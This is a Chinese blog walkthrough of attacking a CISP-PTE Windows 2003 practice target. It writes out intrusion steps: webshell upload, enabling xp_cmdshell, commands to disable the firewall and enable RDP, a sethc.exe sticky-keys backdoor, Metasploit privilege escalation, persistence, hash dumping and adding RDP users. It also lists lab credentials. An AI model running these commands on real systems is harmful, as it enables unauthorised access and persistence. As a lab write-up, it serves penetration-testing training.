CISP-PTE-Windows2003教程

这篇具有很好参考价值的文章主要介绍了CISP-PTE-Windows2003教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

为方便后续操作,建议和kali在同一网段。
获取到靶机IP后,扫描端口,1433是sqlserver的
CISP-PTE-Windows2003教程
测出用户名admin,但是密码爆破失败
CISP-PTE-Windows2003教程扫描目录发现配置文件
CISP-PTE-Windows2003教程配置文件中找到数据库的用户名和密码
CISP-PTE-Windows2003教程使用Microsoft SQL Server Studio连接,注意此时不是sa用户
CISP-PTE-Windows2003教程数据库中找到密码,成功登录
CISP-PTE-Windows2003教程尝试上传文件,但是黑名单限制较死,看到里面已经有人上传上去,应该是图片上传上去绕过,点击下载查看连接密码
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程拿到服务账户的权限,与Users账户的权限相同。想办法远程桌面上去
收集信息,查看网络连接情况,看到3389没开
CISP-PTE-Windows2003教程windows平台一般都有防火墙,netsh firewall show state查看防火墙状态

CISP-PTE-Windows2003教程netsh firewall set opmode mod=disable拒绝访问,权限不够关不了
CISP-PTE-Windows2003教程利用数据库操作命令关闭系统防火墙,但是咱们不是sa 用户没有权限
而且也没有xp_cmdshell组件,权限不够也无法执行上传组件的操作
exec master.sys.sp_addextendedproc ‘xp_cmdshell’, ‘C:\Users\Administrator\Desktop\xplog70\xplog70.dll’
CISP-PTE-Windows2003教程拥有sa(管理员)权限,开启xp_cmdshell
EXEC sp_configure ‘show advanced options’,1;RECONFIGURE;
EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

EXEC master.dbo.xp_cmdshell ‘REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’
EXEC master.dbo.xp_cmdshell ‘netsh firewall set opmode disable’
EXEC master.dbo.xp_cmdshell ‘cd C:\WINDOWS\system’
EXEC master.dbo.xp_cmdshell ‘copy cmd.exe c:\WINDOWS\system\sethc.exe’
EXEC master.dbo.xp_cmdshell ‘netstat -an’
修改sa密码 exec sp_password NULL, ‘pasw’, ‘sa’
尝试提权

CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程https://www.hacking8.com/mst-sec-lecture-notes/8.html
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用multi/recon/local_exploit_suggeser模块查看靶机可以利用的漏洞以及相应的模块
CISP-PTE-Windows2003教程使用第一个模块尝试,target默认windows 7
CISP-PTE-Windows2003教程提权成功
CISP-PTE-Windows2003教程权限维持,使用windows/local/persistence模块快速进行权限维持
CISP-PTE-Windows2003教程导出hash值
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程复制管理员hash拿去解密或者使用john破解
CISP-PTE-Windows2003教程获取到密码后,接下来就去开启3389端口远程桌面过去
本来咱们获取到管理员权限后可以直接执行命令,但是shell返回不了,听说原因有很多
CISP-PTE-Windows2003教程这里使用msf的post/windows/manage/enable_rdp模块开启,这个模块好像也可以创新新的远程桌面用户
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程nmap扫描3389是否开启,或者nc -v ip 端口
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用kali自带的rdesktop或者物理机远程mstsc
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程之前咱们看到系统有防火墙,msf搜索有没有关闭防火墙的模块,但是好像没有
post/windows/manage/exec_powershell利用此模块执行powershell命令失败
CISP-PTE-Windows2003教程exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
使用第二个模块重新反弹一个高权限的shell
CISP-PTE-Windows2003教程反弹的shell还是不能进去
CISP-PTE-Windows2003教程看看meterpreter命令有没有可用的点,meterpreter命令https://www.cnblogs.com/backlion/p/9484949.html
search -f cmd.exe搜索文件
CISP-PTE-Windows2003教程execute -H -i -f cmd.exe代替shell尝试获取终端权限
CISP-PTE-Windows2003教程可以上传反弹的木马,然后利用execute执行反弹回来,执行的时候失败,太菜
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程使用vnc,run vnc打开远程桌面失败
CISP-PTE-Windows2003教程查看本地用户组
CISP-PTE-Windows2003教程查看远程桌面用户发现为空
CISP-PTE-Windows2003教程
尝试将管理员添加进远程桌面用户组里面
CISP-PTE-Windows2003教程有域控的话倒是可以将用户添加到组里面
CISP-PTE-Windows2003教程run getgui -e可以看到RDP已经启用
CISP-PTE-Windows2003教程run getgui -u admin -p admin添加账号
CISP-PTE-Windows2003教程post/windows/manage/killav模块只能杀防护软件,不能搞防火墙
CISP-PTE-Windows2003教程"">net localgroup "Remote Desktop Users"看到已经成功将admin用户添加进远程用户组
CISP-PTE-Windows2003教程rdesktop -u admin -p admin 192.168.1.119:3389连接还是失败,感觉是防火墙拦了
现在虽然拿到系统权限,但是拿不到控制台权限,也就无法关闭防火墙。咱们虽然有管理员账号密码,但是咱们不能直接去登录靶机,要是这样就简单了,咱们得用搞远程的方式来搞它!
不够好在有数据库,可以去拿到数据库sa的密码,登录后执行数据库操作继而来关闭防火墙。
爆破sa用户密码,但是无数字典过后还是一无所获。
CISP-PTE-Windows2003教程修改远程桌面端口为27689的端口,也就是靶机开放的web端口
CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程CISP-PTE-Windows2003教程协议不对应,也不行,防火墙只开了1433和27689,控制台权限拿不了关不了防火墙。sa用户密码爆破不出来,系统库中sa的hash也为NULL。
CISP-PTE-Windows2003教程key3:4d9d3q8v,admin:asdadwn_d2112用这些密码登录sa失败。尝试其他模块。
第三个模块windows/local/ms14_070_tcpip_ioctl用来提权到system
第四个exploit/windows/local/ms15_051_client_copy_image也是提权
剩下的几个网上搜了一下也都是提权的 模块,看来防火墙终究是关不了,还是太菜!
meterpreter能获取,但是shell获取不到,sa密码不知道也爆破不出来,防火墙关不掉,知道怎么关的师傅还望不吝赐教!文章来源地址https://www.toymoban.com/news/detail-490798.html

到了这里,关于CISP-PTE-Windows2003教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 虚拟机VMware里面安装Windows sever 2003版本详细教程

    python当中的第三方wxPython库的安装解答_pip install wx_张小鱼༒的博客-CSDN博客 centos7配置静态网络常见问题归纳_centos7网络问题_张小鱼༒的博客-CSDN博客 spark里面配置jdk后的编程与Hadoop配置_张小鱼༒的博客-CSDN博客 系列精品文章目录 文章目录 前言 一、准备工作 下载Windows serve

    2024年02月06日
    浏览(15)
  • VMware虚拟机安装Windows Server 2003

    哈喽,各位小伙伴大家好,win server2003算是拖了比较久了,一直没发布,今天完成server2003的安装后server系列的安装教程就告一段落了。马上暑假了,想必新生开学之后,很多计算机网络专业的同学们要开始接触到Windows Server了,这也是计算机网络技术专业的专业基础课程,想

    2024年02月09日
    浏览(21)
  • windows2003系统SSL证书单站点部署https

    本文将讲解,在windows 2003操作系统下,IIS 6 环境的服务器ssl证书安装教程。 安装前,请准备好SSL证书,没有的话,可以点这里申请SSL证书 部署前请退出服务器内安装的杀毒软件(360、金山、安全狗等安全软件有可能导致SSL证书部署出错) 一、解压证书文件。证书文件解压后

    2024年02月06日
    浏览(21)
  • 关于windows server 2003 web服务器搭建详解(内涵步骤)

    关于windows server 2003 web服务器搭建 实验环境:windows server 2003(设置两个网卡),win 7或xp系统,都在同一网段下测试 我的服务器和客户机均为NAT模式,网段为192.168.19.0 步骤如下: 1、安装web服务器组件 2 、安装完成后打开web服务器,Internet信息服务-服务器名-网站-单击右键-新

    2024年02月09日
    浏览(17)
  • 在 Windows Server 2003 上部署和配置 IIS 服务器

    本文介绍了在 Windows Server 2003 环境下部署和配置 IIS 服务器的步骤,包括安装、配置万维网服务、查看端口号、发布静态网站、发布多个网站、发布动态网站等操作过程。详细描述了如何设置网站、分配 IP 地址、验证网站访问、解决端口冲突和权限问题,以及绑定不同域名等策略。

    2024年02月22日
    浏览(30)
  • Windows Server2003服务器密码忘记情况下,密码破解方法汇总

    使用微软官方的MSDaRT,全称为Microsoft Diagnostics and Recovery Toolset,是微软的一套完整的系统诊断和修复工具。拥有恢复系统密码、修复系统文件、清除恶意软件、还原删除文件和修复硬盘分区等诸多功能,目前归属于MDOP(即微软桌面优化套件(Microsoft Desktop Optimization Pack))。是最

    2024年02月06日
    浏览(13)
  • PL2303驱动程序不支持WINDOWS 11及后续版本的解决办法

    更新了Windows11之后,发现计算机—设备管理里面的PL2303(USB转串口的驱动程序)提示:PL2303驱动程序不支持WINDOWS 11及后续版本,请安装正确驱动程序。 具体的解决办法和步骤可参考如下: 安装旧版本的驱动(下载地址如下,或自己安装个旧版本的) PL2303 USB转串口驱动程序

    2024年02月11日
    浏览(14)
  • 推荐windows命令行软件管理工具WinGet,相当方便!

    WinGet是微软推出的支持win10及以上操作系统的软件管理工具,全称为\\\'windows package manager client\\\'。 可以在windows操作系统命令行轻松的安装/卸载或升级应用程序,里面的软件库对接的是\\\'Microsoft Store\\\'(微软应用商店)。 WinGet工具默认是操作系统本身就自带的,若是需要升级可以前

    2024年02月09日
    浏览(62)
  • 如何关闭“若要接收后续google chrome更新,您需使用windows10或更高版本”

    如何关闭“若要接收后续 google chrome 更新,您需使用 windows 10 或更高版本” - 知乎

    2024年02月12日
    浏览(25)
  • ​Unity Vuforia 新手(图片识别)教程,后续整理 实体识别 详细流程

    最近有个Holoens2 识别灭火器实体交互的项目,大概有2-3年没有搞MR的项目了,重新看一下,以前没有记录的习惯,现在慢慢培养一下。 小Dome链接: link 图片识别 新手教程链接: link 识别物体 新手教程链接: link unity Holoens2开发使用Vuforia 新手教程链接: link 运行官方 Vuforia Hololen

    2024年02月04日
    浏览(19)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包